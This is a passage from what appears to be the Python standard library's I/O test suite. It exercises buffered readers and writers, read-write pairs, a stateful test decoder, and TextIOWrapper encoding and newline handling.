self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
